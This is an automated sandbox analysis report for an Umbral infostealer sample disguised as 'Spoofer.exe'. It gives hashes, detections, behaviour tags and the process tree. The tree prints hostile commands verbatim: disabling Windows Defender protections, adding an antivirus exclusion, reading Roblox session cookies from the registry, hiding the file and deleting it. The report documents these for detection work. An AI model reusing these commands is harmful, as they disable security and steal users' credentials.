Analysis
-
max time kernel
91s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
09-02-2024 21:50
Behavioral task
behavioral1
Sample
Spoofer.exe
Resource
win7-20231129-en
General
-
Target
Spoofer.exe
-
Size
231KB
-
MD5
c964c96a473bbd29377a62c0d6e1d100
-
SHA1
879c4eebdfce76f13a2be8209c5b1ce3676152ef
-
SHA256
e6ce3dd93c2d407085ea10bb6f22bd89a34e7fff719e5579ee47f4f2fdaed921
-
SHA512
36e472d0b7d34a3b9968eb4c540cf839592df4b1147c1063fd0be4b72748cd48c0d8d46ef5cb6949932844951cd2f2dc5de7fdecbc98fc232958fe285813cf95
-
SSDEEP
6144:xloZM9rIkd8g+EtXHkv/iD4085oBPUon6WvRsY9+N0C8e1mkHi:DoZOL+EP8085oBPUon6WvRsY9eHC
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/2732-0-0x000002796D080000-0x000002796D0C0000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Spoofer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 discord.com 26 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3264 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4904 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4084 powershell.exe 4084 powershell.exe 3628 powershell.exe 3628 powershell.exe 400 powershell.exe 400 powershell.exe 4500 powershell.exe 4500 powershell.exe 5068 powershell.exe 5068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2732 Spoofer.exe Token: SeDebugPrivilege 4084 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeIncreaseQuotaPrivilege 1312 wmic.exe Token: SeSecurityPrivilege 1312 wmic.exe Token: SeTakeOwnershipPrivilege 1312 wmic.exe Token: SeLoadDriverPrivilege 1312 wmic.exe Token: SeSystemProfilePrivilege 1312 wmic.exe Token: SeSystemtimePrivilege 1312 wmic.exe Token: SeProfSingleProcessPrivilege 1312 wmic.exe Token: SeIncBasePriorityPrivilege 1312 wmic.exe Token: SeCreatePagefilePrivilege 1312 wmic.exe Token: SeBackupPrivilege 1312 wmic.exe Token: SeRestorePrivilege 1312 wmic.exe Token: SeShutdownPrivilege 1312 wmic.exe Token: SeDebugPrivilege 1312 wmic.exe Token: SeSystemEnvironmentPrivilege 1312 wmic.exe Token: SeRemoteShutdownPrivilege 1312 wmic.exe Token: SeUndockPrivilege 1312 wmic.exe Token: SeManageVolumePrivilege 1312 wmic.exe Token: 33 1312 wmic.exe Token: 34 1312 wmic.exe Token: 35 1312 wmic.exe Token: 36 1312 wmic.exe Token: SeIncreaseQuotaPrivilege 1312 wmic.exe Token: SeSecurityPrivilege 1312 wmic.exe Token: SeTakeOwnershipPrivilege 1312 wmic.exe Token: SeLoadDriverPrivilege 1312 wmic.exe Token: SeSystemProfilePrivilege 1312 wmic.exe Token: SeSystemtimePrivilege 1312 wmic.exe Token: SeProfSingleProcessPrivilege 1312 wmic.exe Token: SeIncBasePriorityPrivilege 1312 wmic.exe Token: SeCreatePagefilePrivilege 1312 wmic.exe Token: SeBackupPrivilege 1312 wmic.exe Token: SeRestorePrivilege 1312 wmic.exe Token: SeShutdownPrivilege 1312 wmic.exe Token: SeDebugPrivilege 1312 wmic.exe Token: SeSystemEnvironmentPrivilege 1312 wmic.exe Token: SeRemoteShutdownPrivilege 1312 wmic.exe Token: SeUndockPrivilege 1312 wmic.exe Token: SeManageVolumePrivilege 1312 wmic.exe Token: 33 1312 wmic.exe Token: 34 1312 wmic.exe Token: 35 1312 wmic.exe Token: 36 1312 wmic.exe Token: SeIncreaseQuotaPrivilege 4132 wmic.exe Token: SeSecurityPrivilege 4132 wmic.exe Token: SeTakeOwnershipPrivilege 4132 wmic.exe Token: SeLoadDriverPrivilege 4132 wmic.exe Token: SeSystemProfilePrivilege 4132 wmic.exe Token: SeSystemtimePrivilege 4132 wmic.exe Token: SeProfSingleProcessPrivilege 4132 wmic.exe Token: SeIncBasePriorityPrivilege 4132 wmic.exe Token: SeCreatePagefilePrivilege 4132 wmic.exe Token: SeBackupPrivilege 4132 wmic.exe Token: SeRestorePrivilege 4132 wmic.exe Token: SeShutdownPrivilege 4132 wmic.exe Token: SeDebugPrivilege 4132 wmic.exe Token: SeSystemEnvironmentPrivilege 4132 wmic.exe Token: SeRemoteShutdownPrivilege 4132 wmic.exe Token: SeUndockPrivilege 4132 wmic.exe Token: SeManageVolumePrivilege 4132 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2732 wrote to memory of 3824 2732 Spoofer.exe 85 PID 2732 wrote to memory of 3824 2732 Spoofer.exe 85 PID 2732 wrote to memory of 4084 2732 Spoofer.exe 87 PID 2732 wrote to memory of 4084 2732 Spoofer.exe 87 PID 2732 wrote to memory of 3628 2732 Spoofer.exe 89 PID 2732 wrote to memory of 3628 2732 Spoofer.exe 89 PID 2732 wrote to memory of 400 2732 Spoofer.exe 91 PID 2732 wrote to memory of 400 2732 Spoofer.exe 91 PID 2732 wrote to memory of 4500 2732 Spoofer.exe 93 PID 2732 wrote to memory of 4500 2732 Spoofer.exe 93 PID 2732 wrote to memory of 1312 2732 Spoofer.exe 96 PID 2732 wrote to memory of 1312 2732 Spoofer.exe 96 PID 2732 wrote to memory of 4132 2732 Spoofer.exe 98 PID 2732 wrote to memory of 4132 2732 Spoofer.exe 98 PID 2732 wrote to memory of 3544 2732 Spoofer.exe 100 PID 2732 wrote to memory of 3544 2732 Spoofer.exe 100 PID 2732 wrote to memory of 5068 2732 Spoofer.exe 103 PID 2732 wrote to memory of 5068 2732 Spoofer.exe 103 PID 2732 wrote to memory of 3264 2732 Spoofer.exe 105 PID 2732 wrote to memory of 3264 2732 Spoofer.exe 105 PID 2732 wrote to memory of 3032 2732 Spoofer.exe 110 PID 2732 wrote to memory of 3032 2732 Spoofer.exe 110 PID 3032 wrote to memory of 4904 3032 cmd.exe 111 PID 3032 wrote to memory of 4904 3032 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3824 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Spoofer.exe"2⤵
- Views/modifies file attributes
PID:3824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Spoofer.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5068
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3264
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Spoofer.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:4904
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD58db9c39f7c3d1b4a53b68c2d16e7c044
SHA1e719df2fe37682d5ebd4b1e4a1ea45f502dc716b
SHA2560c4ed7f771336125f93ed80646d8de8dce62652e8ac6f68e204dcfd1f521cec6
SHA5123a919a6cd6b32d88277941fda9baf84c9c75bbafc5d4fde89d45b6688547e3042bfeba94845be3aae7b2a00ad3d24c7561b48f335292ec47485fb16f6a8fb7f0
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD5ca9486e86c2d150143b791c6d79e4cb9
SHA110bf74986105e10be0b3f7ecf7e421142457cadb
SHA256943f39c8d418b82f2620e5712d77b0f2c74e8bcfed7757bf6bfe51cd7e0f54ad
SHA512ecc4d2ca449b604fc6fedeac2f1d41226dc1cc38282cde57a89d87d7226e610fc21e4dd2eb172b5066cd9b57ae78eee681df941012924121462054e72c026fbc
-
Filesize
1KB
MD588be3bc8a7f90e3953298c0fdbec4d72
SHA1f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA5124fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82